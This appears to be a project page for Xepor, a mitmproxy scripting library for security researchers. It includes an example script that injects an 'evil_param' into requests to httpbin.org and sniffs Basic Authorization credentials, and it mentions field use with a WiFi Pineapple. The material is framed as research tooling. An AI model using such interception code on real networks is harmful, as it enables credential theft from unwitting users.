Xepor (pronounced /ˈzɛfə/, zephyr), a web routing framework for reverse engineers and security researchers. It provides a Flask-like API for hackers to intercept and modify HTTP request and/or HTTP response in a human-friendly coding style.
This project is meant to be used with mitmproxy. User write scripts with xepor
, and run the script inside mitmproxy with mitmproxy -s your-script.py
.
If you want to step from PoC to production, from demo(e.g. http-reply-from-proxy.py, http-trailers.py, http-stream-modify.py) to something you could take out with your WiFi Pineapple, then Xepor is for you!
@api.route()
, just like Flask! Write everything in one script and no if..else
any more.InterceptedAPI
instance.mitmproxy
/ mitmweb
+ regular
/ transparent
/ socks5
/ reverse:SPEC
/ upstream:SPEC
) are fully supported.SSL stripping is NOT provided by this project.
pip install xepor
Take the script from examples/httpbin as an example.
In this example, we setup the mitmproxy server on 127.0.0.1
. You could change it to any IP on your machine or alternatively to the IP of your VPS. The mitmproxy server running in reverse, upstream and transparent mode requires --set connection_strategy=lazy
option to be set so that Xepor could function correctly. I recommand this option always be on for best stability.
Set your Browser HTTP Proxy to http://127.0.0.1:8080
, and access web interface at http://127.0.0.1:8081/.
Send a GET request from http://httpbin.org/#/HTTP_Methods/get_get , Then you could see the modification made by Xepor in mitmweb interface, browser devtools or Wireshark.
The httpbin.py
do two things.
payload=evil_param
inside HTTP request.Authorization
headers from HTTP requests and print the password to the attacker.Just what mitmproxy always do, but with code written in xepor way.
from mitmproxy.http import HTTPFlow
from xepor import InterceptedAPI, RouteType
HOST_HTTPBIN = “httpbin.org”
api = InterceptedAPI(HOST_HTTPBIN)
@api.route(“/get”)
def change_your_request(flow: HTTPFlow):
“””
Modify URL query param.
Test at:
http://httpbin.org/#/HTTP_Methods/get_get
“””
flow.request.query[“payload”] = “evil_param”
@api.route(“/basic-auth/{usr}/{pwd}”, rtype=RouteType.RESPONSE)
def capture_auth(flow: HTTPFlow, usr=None, pwd=None):
“””
Sniffing password.
Test at:
http://httpbin.org/#/Auth/get_basic_auth__user___passwd_
“””
print(
f”auth @ {usr} + {pwd}:”,
f”Captured {‘successful’ if flow.response.status_code < 300 else ‘unsuccessful’} login:”,
flow.request.headers.get(“Authorization”, “”),
)
addons = [api]
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…